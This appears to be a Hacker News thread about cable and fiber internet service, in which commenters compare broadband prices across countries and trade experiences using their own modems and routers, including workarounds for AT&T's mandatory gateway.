| pathseeker wrote:
| > The Internet itself is "a zoo of endpoints on a shared medium",
|
| No, the shared medium in this case is referring to the last part of the cable network where everyone in a neighborhood is transmitting effectively onto the same cable.
|
| All it takes is a single device with a broken configuration to spew crap onto the wrong channels, taking down the whole neighborhood.
| https://en.wikipedia.org/wiki/DOCSIS#Physical_layer
|
| On the Internet it stops being a shared medium the minute it gets out of the cable network into fiber/ethernet switched+routed interconnections.
| hiram112 wrote:
| What's your cost and speed of the fiber?
|
| Also, if you didn't need so much bandwidth, is it possible to just order a basic 100Mb/10Mb connection for a nominal fee of, say, 30 Euro?
|
| The speeds in the US aren't actually that bad, but you're basically forced to pay for everything: paid cable TV, equipment rental fees, etc., and your $40 plan ends up creeping towards $100 / month after the fees and taxes, with increases every year.
| ProZsolt wrote:
| Don't know about NL, but in Hungary and a lot of other EU countries you can get 100Mb/10Mb for about 10 EUR, gigabit for 20-30.
| thedance wrote:
| This varies greatly by locale and is not uniform across the USA. In Berkeley, California I have fiber service that terminates in my own equipment, no rented equipment and no bundled services (TV, phone, etc). It's nominally symmetric gigabit service for $40/month.
| hugofloss wrote:
| For me, in NL, it's about 55 Euro per month for 200/200 fiber and TV (including fees and taxes). Unfortunately this increases every year in NL as well.
| msla wrote:
| I have Spectrum cable Internet. I use their modem, but I supply my own router, and they've never given me any trouble. In fact, they recently upgraded my modem (from a Scientific Atlanta 2203C to a Ubee E31U2V1) and they didn't send me a router. The Ubee E31U2V1, like the Scientific Atlanta 2203C before it, only has one Ethernet port, and their official guide to getting the new modem working involved rebooting an external router, so there's no possible way they have a problem with customer-owned routers.
|
| Which works out great for me. I can use OpenWRT with no hassle.
|
| More to the point, I see the cable stuff as "ISP land" in that it's directly interfacing with their internal hardware, and so has to dance to their tune very directly, whereas Ethernet and TCP/IP are common, and so will obey my rules in my home.
| I don't expect my modem to perform adblocking, which is why my router does it, and I'm not going to be stupid and try to "uncap" my modem to get more speed, so I don't see a point to being able to provide my own cable modem. As long as I can own the router which provides the only path in and out of my LAN, I can do everything I'm capable of doing anyway, as far as I can see.
| pmh wrote:
| > I don't see a point to being able to provide my own cable modem
|
| Other cable providers (e.g. Comcast) charge you a monthly fee (~$5-15) to rent their modem. Buying a modem gets cost effective pretty quickly.
| AmericanChopper wrote:
| I use my own one because the $2 Huawei ones perform really poorly; they're the source of a large portion of general internet performance issues for a lot of people.
| markus92 wrote:
| It's been more common for DSL too, but I haven't heard of anyone using their own DOCSIS modem for Ziggo though. Have you?
| r1ch wrote:
| Do you know if this applies to cable modems too? Are they required to allow a 3rd party modem that they normally wouldn't provide to customers?
| avip wrote:
| This law is a tech-support nightmare.
|
| You can call your ISP with _any_ arbitrary piece of non-branded random AliExpress $#@$ of a network eq. and they must walk you through configuring it? That does not make much sense to me.
| hedora wrote:
| The US has (had?) some network neutrality rules around discriminating against different types of hardware, but AT&T just does it anyway. (They require you to use their DSL modem + router + wifi and it has broken support for adding a second router behind it.)
| strbean wrote:
| Dealing with the same thing with AT&T fiber. There was word of a hack involving putting your router behind a switch with the AT&T router after cloning the MAC, then booting them both up and letting your router pick up the DHCP responses along with the AT&T router.
| Once the AT&T router had done its proprietary handshake, you could disconnect the AT&T router.
|
| Unfortunately I had no luck with that - my loose theory is that my EdgeRouter was doing a ping check to see if the IP was already taken before accepting the DHCP lease...
|
| I was able to get "IP passthrough" mode working with the AT&T router though. The key hiccup was that the AT&T router had to be on a different subnet than my router's LAN subnet.
| jonpurdy wrote:
| I just moved to SF and got AT&T gigabit fiber in mid-February. I followed this guide and got it working at gigabit speeds (eventually): https://www.reddit.com/r/Ubiquiti/comments/cjw9jt/howto_bypa...
|
| It's been working great since I set it up; highly recommended!
|
| Hardware offloading needs to be enabled and QoS disabled for gigabit speeds (~900Mbps both ways, simultaneous ~500Mbps both ways).
|
| If you send me an email (hn-202003@jonpurdy.com), I can send you my exact configs.
| thinkloop wrote:
| How can you do without the modem? Which Ubiquiti product is that?
| hugofloss wrote:
| I used the UniFi Security Gateway to replace my ISP's modem.
| philg_jr wrote:
| Typically, FTTH doesn't require a "modem".
|
| In my case, I have VZ Fios in the northeast US. Their termination point at my house has an RJ45 Ethernet connection. It goes directly to my pfSense router.
| ksec wrote:
| So they actually have an ONT somewhere and provide you with an RJ45 Ethernet port only?
|
| This is brilliant! Why aren't more ISPs doing it? I don't want another ONT / modem / piece of equipment in my flat.
| cameronh90 wrote:
| As far as I'm aware, the UK doesn't have a law like this, but I've never had a situation where an ISP cared; they just tell you that if you have problems they might not be able to help. I think you get interop issues with TV and landline with those ISPs where everything is bundled into one fibre, but the internet bit usually works fine.
| jedimastert wrote:
| I don't know if it's "law" in America but I've never seen a major ISP give any more guff than sometimes making a technician come out to read the modem's MAC address. I've never had an ISP's router or modem on my networks.
| robotnikman wrote:
| Same. From my experience you can use a modem of your choice; you just need to provide your MAC address to your ISP and it's good to go.
| PascLeRasc wrote:
| Slightly off-topic: I'd really like to run screenfetch on my router (Asus RT-N66U), but it doesn't have enough free space to sftp the script to it [1]. Piping the script just freezes up. Does anyone know a good workaround? Has anyone ever tried this?
|
| [1] https://unix.stackexchange.com/questions/510947/how-can-i-ru...
| Topgamer7 wrote:
| Check if your router has tmpfs mounted. IIRC that's RAM; it should probably have enough space for you to upload it and run it from there.
| k__ wrote:
| The only router with a good admin interface I ever had was one with open source software.
|
| Every other router, for 20 years now, had a slow and buggy web interface.
|
| Why is this?!
| skizm wrote:
| My ISP has a cloud access "feature". If I go to 192.168.1.1 it redirects me to their "router.MYISP.net" site. What's the best way to go about disabling this? Should I just dump the rented router for my own?
| simplyinfinity wrote:
| Asus (and others) have the same feature. In my case it's a simple redirect from the IP 192.168.1.1 to router.myasus.com, which has a DNS record of 192.168.1.1. So all it does is redirect to a domain.
___________________________________________________________________
(page generated 2020-03-26 23:00 UTC)